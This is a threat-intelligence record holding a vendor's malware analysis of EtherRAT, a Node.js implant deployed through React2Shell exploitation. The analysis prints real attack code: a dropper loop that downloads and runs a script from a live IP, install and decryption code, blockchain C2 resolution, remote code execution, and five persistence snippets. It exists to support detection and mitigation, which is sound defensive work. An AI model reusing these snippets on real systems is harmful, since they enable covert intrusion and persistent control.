{ "id": "c152fbed-916e-4745-9e4b-e5e57c433314", "created_at": "2026-04-06T00:07:10.640766Z", "updated_at": "2026-04-10T03:38:19.891244Z", "deleted_at": null, "sha1_hash": "5d2bba227ea31c26a295bca051517ab9d8c9d11e", "title": "EtherRAT: DPRK uses novel Ethereum implant in React2Shell attacks", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 348658, "plain_text": "EtherRAT: DPRK uses novel Ethereum implant in React2Shell\r\nattacks\r\nBy Sysdig Threat Research Team\r\nPublished: 2025-12-08 · Archived: 2026-04-05 17:59:01 UTC\r\nFalco Feeds extends the power of Falco by giving open source-focused companies\r\naccess to expert-written rules that are continuously updated as new threats are\r\ndiscovered.\r\nlearn more\r\nOn December 5, 2025, just two days after the public disclosure of CVE-2025-55182 – a maximum-severity\r\nremote code execution vulnerability in React Server Components (RSCs) – the Sysdig Threat Research Team\r\nhttps://www.sysdig.com/blog/etherrat-dprk-uses-novel-ethereum-implant-in-react2shell-attacks\r\nPage 1 of 15\n\n(TRT) recovered a novel implant from a compromised Next.js application. Unlike the cryptocurrency miners and\r\ncredential stealers documented in early React2Shell exploitation, this payload, dubbed EtherRAT, represents\r\nsomething far more sophisticated. It is a persistent access implant that combines techniques from at least three\r\ndocumented campaigns into a single, previously unreported attack chain.\r\nEtherRAT leverages Ethereum smart contracts for command-and-control (C2) resolution, deploys five\r\nindependent Linux persistence mechanisms, and downloads its own Node.js runtime from nodejs.org. This\r\ncombination of capabilities has not been previously observed in React2Shell exploitation. The Sysdig TRT’s\r\nanalysis reveals significant overlap with North Korea-linked \"Contagious Interview\" tooling, suggesting either\r\nDemocratic People's Republic of Korea (DPRK) actors have pivoted to exploiting React2Shell, or sophisticated\r\ntool-sharing is occurring between nation-state groups.\r\nThe Sysdig TRT has analyzed how this implant works, how it compares to documented React2Shell activity, and\r\nwhat defenders can do to detect it. Their full findings are detailed below, or navigate first to the Sysdig TRT’s\r\ndetection strategies and mitigation recommendations.\r\nOverview of React2Shell and CVE-2025-55182\r\nCVE-2025-55182 is an unsafe deserialization vulnerability in RSCs that allows unauthenticated remote code\r\nexecution via a single HTTP request. Disclosed on December 3, 2025, by security researcher Lachlan Davidson,\r\nthe vulnerability affects React 19.x and frameworks built on it, including Next.js 15.x and 16.x when using App\r\nRouter. CISA added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog on December 5, 2025.\r\nWithin hours of public disclosure, multiple security vendors documented active exploitation:\r\nChina-nexus groups (i.e., Earth Lamia, Jackpot Panda, UNC5174) deploying Cobalt Strike beacons,\r\nSliver, and Vshell backdoors\r\nOpportunistic actors installing cryptocurrency miners (primarily XMRig)\r\nCredential harvesters targeting AWS configuration files and environment variables\r\nThe payloads documented in React2Shell exploitation share common characteristics: they rely on PowerShell or\r\nshell commands, use hardcoded C2 infrastructure, and focus on immediate credential theft or cryptomining.\r\nEtherRAT differs substantially from this pattern.\r\nEnter EtherRAT: A four-stage attack chain\r\nThe attack begins with a base64-encoded shell command executed via React2Shell, which downloads and\r\nexecutes a shell script that deploys the JavaScript implant.\r\nStage Purpose Key Capability\r\nStage 0: Initial\r\nAccess\r\nDownload and execute shell script Retry loop with curl/wget/python3 fallback\r\nhttps://www.sysdig.com/blog/etherrat-dprk-uses-novel-ethereum-implant-in-react2shell-attacks\r\nPage 2 of 15\n\nStage Purpose Key Capability\r\nStage 1: Deployment)\r\nDownload Node.js, write\r\npayloads\r\nLegitimate runtime from nodejs.org\r\nStage 2: Dropper\r\nDecrypt and execute main\r\npayload\r\nAES-256-CBC decryption\r\nStage 3: Implant Persistent backdoor access\r\nBlockchain C2, 5x persistence, payload\r\nupdate\r\nStage 0: Initial access via base64 shell dropper \r\nThe React2Shell exploit executes a base64-encoded payload:\r\nsh -c echo \u003cbase64\u003e|base64 -d|bash\r\nWhen decoded, this reveals a persistent download loop:\r\nwhile :; do\r\n (curl -sL http://193.24.123.68:3001/gfdsgsdfhfsd_ghsfdgsfdgsdfg.sh -o ./s.sh 2\u003e/dev/null || \\\r\n wget -qO ./s.sh http://193.24.123.68:3001/gfdsgsdfhfsd_ghsfdgsfdgsdfg.sh 2\u003e/dev/null || \\\r\n python3 -c \"import urllib.request as u;open('./s.sh','wb').write(u.urlopen('http://193.24.123.68:3001/gfdsgsd\r\n [ -s ./s.sh ] \u0026\u0026 chmod +x ./s.sh \u0026\u0026 ./s.sh \u0026\u0026 break\r\n sleep 300\r\ndone\r\nThis dropper demonstrates several red flags:\r\nMultiple download methods: Tries curl, then wget, then python3 to maximize compatibility across target\r\nenvironments.\r\nRetry loop: If download fails, waits 300 seconds and retries indefinitely.\r\nSilent execution: All download commands suppress error output.\r\nSize check: Verifies the downloaded file is non-empty before execution ([ -s ./s.sh ]).\r\nObscured filename: The URL path (gfdsgsdfhfsd_ghsfdgsfdgsdfg.sh) uses a gibberish name to avoid\r\nobvious patterns, though the keyboard-mash style suggests manual creation rather than programmatic\r\ngeneration.\r\nThe downloaded shell script (s.sh) downloads Node.js from nodejs.org, deploys the encrypted payload and\r\nobfuscated JavaScript dropper, then executes Stage 2.\r\nStage 1: Shell script deployment (s.sh)\r\nThe downloaded shell script establishes persistence infrastructure before executing the JavaScript payload. Here's\r\nthe deobfuscated logic:\r\nhttps://www.sysdig.com/blog/etherrat-dprk-uses-novel-ethereum-implant-in-react2shell-attacks\r\nPage 3 of 15\n\n#!/bin/bash\r\nD=\"$HOME/.local/share/.05bf0e9b\"\r\nND=\"$D/.4dai8ovb\"\r\nmkdir -p \"$D\" 2\u003e/dev/null\r\n# Download Node.js runtime from official source\r\nU1=\"https://nodejs.org/dist/v20.10.0/node-v20.10.0-linux-x64.tar.gz\"\r\nU2=\"https://nodejs.org/dist/v20.10.0/node-v20.10.0-linux-x64.tar.xz\"\r\n# Try .tar.gz first, fall back to .tar.xz\r\nif curl -sL \"$U1\" -o \"${Z}.tar.gz\" || wget -q \"$U1\" -O \"${Z}.tar.gz\"; then\r\n tar -xzf \"${Z}.tar.gz\" -C \"$D\" || {\r\n # If extraction fails, try .xz format\r\n curl -sL \"$U2\" -o \"${Z}.tar.xz\" || wget -q \"$U2\" -O \"${Z}.tar.xz\"\r\n tar -xJf \"${Z}.tar.xz\" -C \"$D\"\r\n }\r\nfi\r\nmv \"$D/node-v20.10.0-linux-x64\" \"$ND\"\r\nchmod +x \"$ND/bin/node\"\r\n# Write encrypted payload and obfuscated dropper\r\necho \"\u003cbase64_encrypted_blob\u003e\" | base64 -d \u003e \"$D/.1d5j6rm2mg2d\"\r\necho \"\u003cbase64_obfuscated_js\u003e\" | base64 -d \u003e \"$D/.kxnzl4mtez.js\"\r\n# Execute dropper in background, self-delete\r\nnohup \"$ND/bin/node\" \"$D/.kxnzl4mtez.js\" \u003e/dev/null 2\u003e\u00261 \u0026\r\nrm -f \"${BASH_SOURCE[0]}\"\r\nexit 0\r\nKey observations from Stage 1:\r\nLegitimate Node.js download: Downloads Node.js v20.10.0 directly from nodejs.org, avoiding detection\r\nof bundled suspicious binaries.\r\nHidden directory structure: Uses .local/share/.05bf0e9b with randomized hex subdirectories.\r\nDual payload deployment: Writes both the encrypted blob (.1d5j6rm2mg2d) and an obfuscated JavaScript\r\ndropper (.kxnzl4mtez.js).\r\nSelf-deletion: Removes the shell script after execution to reduce forensic artifacts.\r\nSilent background execution: Uses nohup with stdout/stderr redirected to /dev/null.\r\nStage 2: Obfuscated JavaScript dropper (.kxnzl4mtez.js)\r\nThe dropper decrypts the main payload using AES-256-CBC with hardcoded key material:\r\nhttps://www.sysdig.com/blog/etherrat-dprk-uses-novel-ethereum-implant-in-react2shell-attacks\r\nPage 4 of 15\n\nconst kb = \"cn7uRzKiMgOZ/dDxuclzgDrGKLQ7HEtEZ1Ld6k6eRsg=\"; // Base64 AES key\r\nconst ib = \"2iWxmWx4r98fhW9jIpzKXA==\"; // Base64 IV\r\nconst key = Buffer.from(kb, \"base64\");\r\nconst iv = Buffer.from(ib, \"base64\");\r\nfunction dec(h) {\r\n const k = fs.readFileSync(h);\r\n const l = crypto.createDecipheriv(\"aes-256-cbc\", key, iv);\r\n return Buffer.concat([l.update(k), l.final()]);\r\n}\r\nThe dropper reads an encrypted blob from .1d5j6rm2mg2d, decrypts it, writes the result to .7vfgycfd01.js, and\r\nspawns it using the downloaded Node.js binary located at .4dai8ovb/bin/node. Downloading the runtime from\r\nnodejs.org rather than bundling it is significant: it reduces payload size, avoids detection of suspicious embedded\r\nbinaries, and leverages trusted infrastructure while still ensuring the implant functions regardless of the target's\r\nNode.js installation status.\r\nThe dropper also initializes a state file containing a randomly generated bot ID and the payload filename:\r\nconst r = {\r\n 0: crypto.randomUUID(), // Bot ID\r\n 1: ln // Payload filename (.7vfgycfd01.js)\r\n};\r\nThis state file uses an obscured naming convention: .{md5(script_directory).slice(0,6)}.\r\nStage 3: The main implant\r\nOnce decrypted and launched, EtherRAT establishes persistent access through multiple mechanisms, detailed in\r\nthe Aggressive Linux Persistence section below.\r\nBlockchain-based command and control via Ethereum smart contracts\r\nEtherRAT's most distinctive feature is its use of Ethereum smart contracts for C2 URL resolution. Rather than\r\nhardcoding a C2 server address, which can be blocked or seized, the malware queries an on-chain contract to\r\nretrieve the current C2 URL.\r\nSmart contract query mechanism\r\nEtherRAT queries a smart contract at address 0x22f96d61cf118efabc7c5bf3384734fad2f6ead4 using function\r\nselector 0x7d434425 with parameter 0xE941A9b283006F5163EE6B01c1f23AA5951c4C8D:\r\nhttps://www.sysdig.com/blog/etherrat-dprk-uses-novel-ethereum-implant-in-react2shell-attacks\r\nPage 5 of 15\n\nconst j = \"0x22f96d61cf118efabc7c5bf3384734fad2f6ead4\"; // Contract address\r\nconst k = \"0xE941A9b283006F5163EE6B01c1f23AA5951c4C8D\"; // Lookup parameter\r\nconst B = \"0x7d434425\"; // Function selector\r\nconst C = K =\u003e {\r\n return B + K.toLowerCase().replace(\"0x\", \"\").padStart(64, \"0\");\r\n};\r\nConsensus-based resilience for RPC endpoints\r\nWhat makes this implementation unique is its use of consensus voting across nine public Ethereum remote\r\nprocedure call (RPC) endpoints:\r\nconst m = [\r\n \"https://eth.llamarpc.com\",\r\n \"https://mainnet.gateway.tenderly.co\",\r\n \"https://rpc.flashbots.net/fast\",\r\n \"https://rpc.mevblocker.io\",\r\n \"https://eth-mainnet.public.blastapi.io\",\r\n \"https://ethereum-rpc.publicnode.com\",\r\n \"https://rpc.payload.de\",\r\n \"https://eth.drpc.org\",\r\n \"https://eth.merkle.io\"\r\n];\r\nEtherRAT queries all nine endpoints in parallel, collects responses, and selects the URL returned by the majority:\r\nconst P = {};\r\nO.forEach(Q =\u003e {\r\n P[Q] = (P[Q] || 0) + 1;\r\n});\r\nreturn Object.entries(P).sort((Q, R) =\u003e R[1] - Q[1])[0][0];\r\nThis consensus mechanism protects against several attack scenarios: a single compromised RPC endpoint cannot\r\nredirect bots to a sinkhole, and researchers cannot poison C2 resolution by operating a rogue RPC node. EtherRAT\r\nqueries the blockchain every five minutes, allowing operators to update C2 infrastructure by modifying the smart\r\ncontract – an update that propagates to all deployed bots automatically.\r\nHow blockchain C2 improves on traditional C2\r\nTraditional C2 infrastructure can be disrupted through domain seizure, IP blocking, or takedown requests.\r\nBlockchain-based C2 eliminates these options:\r\nhttps://www.sysdig.com/blog/etherrat-dprk-uses-novel-ethereum-implant-in-react2shell-attacks\r\nPage 6 of 15\n\nTraditional C2 Blockchain C2\r\nDomain can be seized Contract is immutable\r\nIP can be blocked Multiple RPC endpoints\r\nHosting provider can terminate Decentralized infrastructure\r\nSingle point of failure Consensus prevents poisoning\r\nReversing Labs previously documented this technique in the colortoolsv2 and mimelib2 npm packages (July\r\n2025), but those implementations used a single RPC endpoint. The consensus mechanism observed here\r\nrepresents a significant evolution in operational security.\r\nC2 traffic patterns and command execution\r\nOnce EtherRAT resolves the C2 URL from the blockchain, it enters a polling loop that executes every 500\r\nmilliseconds.\r\nRequest structure\r\nEach poll constructs a randomized URL designed to blend with legitimate web traffic:\r\nconst L = p.randomBytes(4).toString(\"hex\"); // Random path segment\r\nconst M = [\"png\", \"jpg\", \"gif\", \"css\", \"ico\", \"webp\"];\r\nconst N = M[Math.floor(Math.random() * M.length)]; // Random \"file\" extension\r\nconst O = [\"id\", \"token\", \"key\", \"b\", \"q\", \"s\", \"v\"];\r\nconst P = O[Math.floor(Math.random() * O.length)]; // Random query parameter\r\n// Resulting URL pattern:\r\n// {c2_base}/api/{random}/{bot_id}/{random}.{ext}?{param}={build_id}\r\nExample request:\r\nGET /api/a8f3b2c1/c6d83cb1-a4de-443d-bd78-da925acc5f8d/d4e5f6a7.png?token=c6d83cb1-a4de-443d-bd78-da925acc5f8d\r\nHost: c2.example.com\r\nX-Bot-Server: https://c2.example.com\r\nThis URL structure mimics Content Delivery Network (CDN) requests for static assets – a common pattern in\r\nlegitimate web traffic that is unlikely to trigger network security alerts.\r\nCommand execution\r\nWhen the C2 server returns a response longer than 10 characters, EtherRAT treats it as JavaScript code and\r\nexecutes it immediately:\r\nhttps://www.sysdig.com/blog/etherrat-dprk-uses-novel-ethereum-implant-in-react2shell-attacks\r\nPage 7 of 15\n\nconst a0 = Object.getPrototypeOf(async function () {}).constructor;\r\nconst a1 = new a0(\r\n \"require\", \"process\", \"Buffer\", \"console\", \"__dirname\", \"__filename\", \"log\",\r\n X // Response body from C2\r\n);\r\nawait a1(require, process, Buffer, console, __dirname, __filename, r);\r\nThis pattern, using the AsyncFunction constructor, is functionally equivalent to eval() but supports asynchronous\r\noperations. EtherRAT passes full Node.js primitives to the executed code, giving operators access to:\r\nPrimitive Capability\r\nrequire Import any Node.js module (e.g., fs , child_process , net , crypto )\r\nprocess Environment variables, platform info, exit control\r\nBuffer Binary data manipulation\r\n__dirname / __filename File system context\r\nThis is a full interactive shell. Operators can execute arbitrary Node.js code with the same privileges as the\r\nimplant process.\r\nFive Linux persistence techniques used by EtherRAT\r\nEtherRAT establishes persistence through five independent mechanisms, ensuring survival across reboots and\r\nsystem maintenance:\r\n1. Systemd user service\r\nThe service file uses a random hexadecimal name (e.g., a1b2c3d4e5f6.service) and a generic description to avoid\r\ndetection. \r\nconst W = o.join(M, \".config\", \"systemd\", \"user\");\r\nconst X = p.randomBytes(6).toString(\"hex\");\r\nconst Y = o.join(W, X + \".service\");\r\nn.writeFileSync(Y, `[Unit]\r\nDescription=User Application Service\r\nAfter=network.target\r\n[Service]\r\nType=simple\r\nExecStart=${P}\r\nRestart=always\r\nRestartSec=30\r\nhttps://www.sysdig.com/blog/etherrat-dprk-uses-novel-ethereum-implant-in-react2shell-attacks\r\nPage 8 of 15\n\n[Install]\r\nWantedBy=default.target`);\r\nR(\"systemctl --user daemon-reload\");\r\nR(\"systemctl --user enable \" + X + \".service\");\r\nR(\"systemctl --user start \" + X + \".service\");\r\n2. XDG autostart entry\r\nUsing XDG for persistence is not very common, likely due to the low percentage of Linux desktop users.\r\nHowever, EtherRAT aims for more coverage than the typical malware.\r\nconst a2 = o.join(M, \".config\", \"autostart\");\r\nconst a3 = p.randomBytes(6).toString(\"hex\");\r\nconst a4 = o.join(a2, a3 + \".desktop\");\r\nn.writeFileSync(a4, `[Desktop Entry]\r\nType=Application\r\nName=System Service\r\nExec=${P}\r\nHidden=true\r\nNoDisplay=true\r\nX-GNOME-Autostart-enabled=true`);\r\n3. Cron job\r\nAfter a reboot, this added cron job will run EtherRAT after 30 seconds, which gives time for the system to come\r\nall the way up.\r\nconst a7 = \"@reboot sleep 30 \u0026\u0026 \" + P + \" \u003e/dev/null 2\u003e\u00261 \u0026\";\r\nconst a8 = R(\"crontab -l 2\u003e/dev/null || true\", { encoding: \"utf8\" });\r\nif (!a8.includes(N)) {\r\n const a9 = a8.trim() + \"\\n\" + a7 + \"\\n\";\r\n R(\"echo \\\"\" + a9 + \"\\\" | crontab -\");\r\n}\r\n4. Bashrc injection\r\nThe .bashrc file is also modified so that EtherRAT will run when a user logs into the server.\r\nconst ab = o.join(M, \".bashrc\");\r\nconst ac = \"\\n# System\\n(nohup \" + P + \" \u003e/dev/null 2\u003e\u00261 \u0026) 2\u003e/dev/null\\n\";\r\nhttps://www.sysdig.com/blog/etherrat-dprk-uses-novel-ethereum-implant-in-react2shell-attacks\r\nPage 9 of 15\n\nif (n.existsSync(ab)) {\r\n const ae = n.readFileSync(ab, \"utf8\");\r\n if (!ae.includes(N)) {\r\n n.appendFileSync(ab, ac);\r\n }\r\n}\r\n5. Profile injection\r\nEtherRAT tracks which persistence mechanisms were successfully installed in its state file, avoiding redundant\r\ninstallation attempts.\r\nconst af = o.join(M, \".profile\");\r\nconst ag = \"\\n# App\\n(\" + P + \" \u003e/dev/null 2\u003e\u00261 \u0026) 2\u003e/dev/null\\n\";\r\nif (n.existsSync(af)) {\r\n const ai = n.readFileSync(af, \"utf8\");\r\n if (!ai.includes(N)) {\r\n n.appendFileSync(af, ag);\r\n }\r\n}\r\nEtherRAT’s unique payload update mechanism\r\nEtherRAT includes a capability not observed in other React2Shell payloads. On first successful C2 contact, it\r\nsends its own source code to a /api/reobf/ endpoint and replaces itself with the response:\r\nconst O = n.readFileSync(N, \"utf8\"); // Read own source\r\nconst P = {\r\n code: O, // Current source code\r\n build: i // Build ID\r\n};\r\nconst Q = await fetch(s + \"/api/reobf/\" + z, {\r\n method: \"POST\",\r\n headers: { \"Content-Type\": \"application/json\" },\r\n body: JSON.stringify(P)\r\n});\r\nconst R = await Q.text();\r\nn.writeFileSync(N, R, \"utf8\"); // Overwrite self with response\r\nM[3] = Date.now(); // Record timestamp to prevent repeat\r\nAfter receiving the response, EtherRAT:\r\n1. Writes the new code to disk, overwriting itself.\r\n2. Records a timestamp in the hidden state file to prevent repeated updates\r\n3. Spawns a fresh process with the updated payload.\r\nhttps://www.sysdig.com/blog/etherrat-dprk-uses-novel-ethereum-implant-in-react2shell-attacks\r\nPage 10 of 15\n\n4. Exits the current process.\r\nThe endpoint name suggests re-obfuscation, but without observing actual C2 responses, the exact purpose is\r\nunclear. Possible interpretations include:\r\nRe-obfuscation: The C2 returns a functionally identical but differently obfuscated version, defeating static\r\nsignatures.\r\nPayload upgrade: The initial implant is a lightweight stager; the C2 returns mission-specific functionality.\r\nAnti-analysis: Ensures researchers who capture the initial payload don't have the operational version.\r\nActivation/licensing: The C2 validates the deployment before providing full capabilities.\r\nRegardless of intent, this one-time transformation means each deployed implant potentially diverges from the\r\noriginal payload after activation, complicating signature-based detection.\r\nThreat attribution: Comparing EtherRAT to known DPRK and China campaigns\r\nEtherRAT’s combination of techniques draws similarities from multiple documented campaigns:\r\nThe encrypted loader pattern used in EtherRAT closely matches the DPRK-affiliated BeaverTail malware used in\r\nthe Contagious Interview campaigns.\r\nNotably, while Lazarus Group and other DPRK-affiliated threat actors historically bundle Node.js with their\r\npayloads, the sample we identified downloads Node.js from the official nodejs.org distribution. This represents a\r\nsignificant evolution in tradecraft: trading a smaller payload size for reduced detection risk.\r\nThe key differences in EtherRAT:\r\n1. Delivery vector: React2Shell exploitation rather than fake job interview lures.\r\n2. C2 mechanism: Blockchain-based rather than hardcoded.\r\n3. Persistence: Significantly more aggressive than documented Contagious Interview payloads.\r\n4. No credential harvesting: Unlike BeaverTail/InvisibleFerret, EtherRAT contains no cryptocurrency wallet\r\ntargeting code.\r\nGoogle Threat Intelligence Group (GTIG) recently attributed the use of BeaverTail malware and blockchain-based\r\nC2 techniques to the DPRK-associated threat actor UNC5342. However, without direct code overlap, we cannot\r\nconfirm the threat actor behind EtherRAT is the same. Given some of the significant differences listed above, this\r\nmay represent shared techniques across multiple DPRK-affiliated threat groups. \r\nAlternatively, while DPRK actors may have adopted React2Shell as a new initial access vector, it’s possible\r\nanother sophisticated actor may be combining techniques from multiple documented campaigns to complicate\r\nattribution.\r\nComparison with China-Nexus React2Shell activity\r\nThe documented exploitation of React2Shell by China-affiliated threat actors differs substantially from EtherRAT:\r\nhttps://www.sysdig.com/blog/etherrat-dprk-uses-novel-ethereum-implant-in-react2shell-attacks\r\nPage 11 of 15\n\nActivity China-affiliated actors EtherRAT\r\nInitial payload PowerShell commands Encrypted JavaScript\r\nC2 infrastructure Hardcoded IPs/domains Blockchain-resolved\r\nPersistence Minimal (Cobalt Strike beacon) 5 independent mechanisms\r\nPrimary tools Cobalt Strike, Sliver, Vshell Custom Node.js implant\r\nApparent objective Credential theft, initial access Long-term persistent access\r\nTraffic pattern Known beacon signatures Disguised as static asset requests\r\nNovel capabilities summary\r\nThe technique of downloading Node.js from the official nodejs.org distribution is noteworthy. Rather than\r\nbundling a potentially flagged binary, the attackers leverage a trusted source, making network-based detection\r\nmore difficult since traffic to nodejs.org is legitimate.\r\nHow to detect and mitigate EtherRAT attacks\r\nRuntime threat detection with Sysdig Secure\r\nhttps://www.sysdig.com/blog/etherrat-dprk-uses-novel-ethereum-implant-in-react2shell-attacks\r\nPage 12 of 15\n\nMultiple runtime threat detection rules will trigger if EtherRAT is run on Sysdig Secure-monitored hosts,\r\nincluding:\r\nSuspicious Command Executed by Web Server\r\nBase64-encoded Python Script Execution\r\nDNS Lookup for Miner Pool Domain Detected\r\nSuspicious Cron Modification\r\nSuspicious System Service Modification\r\nModify Shell Configuration File\r\nHunting for EtherRAT network indicators\r\nMonitor for the following patterns:\r\nOutbound connections to 193.24.123.68:3001\r\nHTTP requests for paths with gibberish filenames ending in .sh\r\nDownloads from nodejs.org/dist/v20.10.0/ \r\nOutbound HTTPS requests to multiple Ethereum RPC endpoints in rapid succession\r\nPOST requests to eth_call JSON-RPC method querying contract\r\n0x22f96d61cf118efabc7c5bf3384734fad2f6ead4\r\nPeriodic GET requests with randomized paths ending in static file extensions (.png, .jpg, .gif, .css, .ico,\r\n.webp)\r\nRequests containing X-Bot-Server header\r\nEtherRAT filesystem indicators\r\nEtherRAT uses randomly-generated hidden directory and file names per deployment. Hunt for patterns rather than\r\nspecific paths:\r\nHidden directories in $HOME/.local/share/ with random hexadecimal names (e.g., .05bf0e9b)\r\nNested hidden subdirectories containing a bin/node executable\r\nHidden .js files in user data directories\r\nSystemd user services with random hexadecimal names\r\nXDG autostart entries with Hidden=true and NoDisplay=true\r\nBashrc/profile modifications containing nohup commands launching hidden .js files\r\nIndicators of compromise for EtherRAT\r\nNote: This implant generates random directory and file names per deployment. The file artifacts listed below are\r\nfrom our analyzed sample and should be treated as examples of the naming pattern, not universal indicators of\r\ncompromise (IOCs).\r\nStaging infrastructure\r\nhttps://www.sysdig.com/blog/etherrat-dprk-uses-novel-ethereum-implant-in-react2shell-attacks\r\nPage 13 of 15\n\nType Value\r\nStaging Server 193.24.123.68:3001\r\nPayload URL http://193.24.123.68:3001/gfdsgsdfhfsd_ghsfdgsfdgsdfg.sh\r\nEthereum contract (static)\r\nType Value\r\nContract Address 0x22f96d61cf118efabc7c5bf3384734fad2f6ead4\r\nLookup Parameter 0xE941A9b283006F5163EE6B01c1f23AA5951c4C8D\r\nFunction Selector 0x7d434425\r\nMitigation and response recommendations\r\nOrganizations running RSCs or Next.js should take immediate action:\r\nPatch immediately: Update React to version 19.2.1 or later, and Next.js to patched versions. Rebuild and\r\nredeploy applications after updating.\r\nHunt for persistence: Check for unauthorized systemd user services, XDG autostart entries, cron jobs, and\r\nbashrc/profile modifications on any system that may have been exposed.\r\nMonitor Ethereum RPC traffic: Unusual outbound connections to public Ethereum RPC endpoints from\r\nweb application servers should be investigated.\r\nDeploy runtime detection: Signature-based detection is ineffective against malware that updates its own\r\ncode. Runtime threat detection is critical for identifying this class of implant.\r\nReview application logs: Search for evidence of React2Shell exploitation attempts - unusual POST\r\nrequests to RSC endpoints with malformed payloads.\r\nRotate credentials: If compromise is suspected, rotate all credentials accessible from the affected system,\r\nincluding cloud provider tokens, API keys, and SSH keys.\r\nConclusion: What EtherRAT means for React2Shell and future threats\r\nEtherRAT represents a significant evolution in React2Shell exploitation, moving beyond opportunistic\r\ncryptomining and credential theft toward persistent, stealthy access designed for long-term operations. The\r\ncombination of blockchain-based C2, aggressive multi-vector persistence, and a payload update mechanism\r\ndemonstrates a level of sophistication not previously observed in React2Shell payloads.\r\nThe overlap with DPRK \"Contagious Interview\" tooling raises important questions about attribution and tool-sharing between threat actors. Whether this represents North Korean actors pivoting to new exploitation vectors or\r\nsophisticated technique borrowing by another actor, the result is the same: defenders face a challenging new\r\nimplant that resists traditional detection and takedown methods.\r\nhttps://www.sysdig.com/blog/etherrat-dprk-uses-novel-ethereum-implant-in-react2shell-attacks\r\nPage 14 of 15\n\nThe rising frequency of supply chain and framework-level vulnerabilities, from Log4Shell to React2Shell, makes\r\nruntime threat detection more critical than ever. Since attackers can now combine techniques from multiple\r\ncampaigns and dynamically modify their payloads, organizations cannot rely solely on signature-based detection\r\nor indicator blocking. Continuous monitoring at runtime remains the most reliable defense against this evolving\r\nthreat landscape.\r\nAbout the author\r\nTest drive the right way to defend the cloudwith a security expert\r\nSource: https://www.sysdig.com/blog/etherrat-dprk-uses-novel-ethereum-implant-in-react2shell-attacks\r\nhttps://www.sysdig.com/blog/etherrat-dprk-uses-novel-ethereum-implant-in-react2shell-attacks\r\nPage 15 of 15", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://www.sysdig.com/blog/etherrat-dprk-uses-novel-ethereum-implant-in-react2shell-attacks" ], "report_names": [ "etherrat-dprk-uses-novel-ethereum-implant-in-react2shell-attacks" ], "threat_actors": [ { "id": "2137e858-a11d-4b75-ae54-3267b096a4fc", "created_at": "2025-06-29T02:01:56.98797Z", "updated_at": "2026-04-10T02:00:04.667535Z", "deleted_at": null, "main_name": "Earth Lamia", "aliases": [], "source_name": "ETDA:Earth Lamia", "tools": [ "BypassBoss", "PULSEPACK" ], "source_id": "ETDA", "reports": null }, { "id": "34eea331-d052-4096-ae03-a22f1d090bd4", "created_at": "2025-08-07T02:03:25.073494Z", "updated_at": "2026-04-10T02:00:03.709243Z", "deleted_at": null, "main_name": "NICKEL ACADEMY", "aliases": [ "ATK3 ", "Black Artemis ", "COVELLITE ", "CTG-2460 ", "Citrine Sleet ", "Diamond Sleet ", "Guardians of Peace", "HIDDEN COBRA ", "High Anonymous", "Labyrinth Chollima ", "Lazarus Group ", "NNPT Group", "New Romanic Cyber Army Team", "Temp.Hermit ", "UNC577 ", "Who Am I?", "Whois Team", "ZINC " ], "source_name": "Secureworks:NICKEL ACADEMY", "tools": [ "Destover", "KorHigh", "Volgmer" ], "source_id": "Secureworks", "reports": null }, { "id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2", "created_at": "2022-10-25T16:07:24.471018Z", "updated_at": "2026-04-10T02:00:05.002374Z", "deleted_at": null, "main_name": "Cron", "aliases": [], "source_name": "ETDA:Cron", "tools": [ "Catelites", "Catelites Bot", "CronBot", "TinyZBot" ], "source_id": "ETDA", "reports": null }, { "id": "b302cfdb-30c9-4dce-a968-d2398dda820d", "created_at": "2024-03-28T02:00:05.789775Z", "updated_at": "2026-04-10T02:00:03.611467Z", "deleted_at": null, "main_name": "UNC5174", "aliases": [ "Uteus" ], "source_name": "MISPGALAXY:UNC5174", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "4fc99d9b-9b66-4516-b0db-520fbef049ed", "created_at": "2025-10-29T02:00:51.949631Z", "updated_at": "2026-04-10T02:00:05.346203Z", "deleted_at": null, "main_name": "Contagious Interview", "aliases": [ "Contagious Interview", "DeceptiveDevelopment", "Gwisin Gang", "Tenacious Pungsan", "DEV#POPPER", "PurpleBravo", "TAG-121" ], "source_name": "MITRE:Contagious Interview", "tools": [ "InvisibleFerret", "BeaverTail", "XORIndex Loader", "HexEval Loader" ], "source_id": "MITRE", "reports": null }, { "id": "732597b1-40a8-474c-88cc-eb8a421c29f1", "created_at": "2025-08-07T02:03:25.087732Z", "updated_at": "2026-04-10T02:00:03.776007Z", "deleted_at": null, "main_name": "NICKEL GLADSTONE", "aliases": [ "APT38 ", "ATK 117 ", "Alluring Pisces ", "Black Alicanto ", "Bluenoroff ", "CTG-6459 ", "Citrine Sleet ", "HIDDEN COBRA ", "Lazarus Group", "Sapphire Sleet ", "Selective Pisces ", "Stardust Chollima ", "T-APT-15 ", "TA444 ", "TAG-71 " ], "source_name": "Secureworks:NICKEL GLADSTONE", "tools": [ "AlphaNC", "Bankshot", "CCGC_Proxy", "Ratankba", "RustBucket", "SUGARLOADER", "SwiftLoader", "Wcry" ], "source_id": "Secureworks", "reports": null }, { "id": "a2b92056-9378-4749-926b-7e10c4500dac", "created_at": "2023-01-06T13:46:38.430595Z", "updated_at": "2026-04-10T02:00:02.971571Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Operation DarkSeoul", "Bureau 121", "Group 77", "APT38", "NICKEL GLADSTONE", "G0082", "COPERNICIUM", "Moonstone Sleet", "Operation GhostSecret", "APT 38", "Appleworm", "Unit 121", "ATK3", "G0032", "ATK117", "NewRomanic Cyber Army Team", "Nickel Academy", "Sapphire Sleet", "Lazarus group", "Hastati Group", "Subgroup: Bluenoroff", "Operation Troy", "Black Artemis", "Dark Seoul", "Andariel", "Labyrinth Chollima", "Operation AppleJeus", "COVELLITE", "Citrine Sleet", "DEV-0139", "DEV-1222", "Hidden Cobra", "Bluenoroff", "Stardust Chollima", "Whois Hacking Team", "Diamond Sleet", "TA404", "BeagleBoyz", "APT-C-26" ], "source_name": "MISPGALAXY:Lazarus Group", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "8bcbeb8a-111b-4ea1-a72b-5c7abd8ef132", "created_at": "2025-11-01T02:04:53.050049Z", "updated_at": "2026-04-10T02:00:03.774442Z", "deleted_at": null, "main_name": "BRONZE SNOWDROP", "aliases": [ 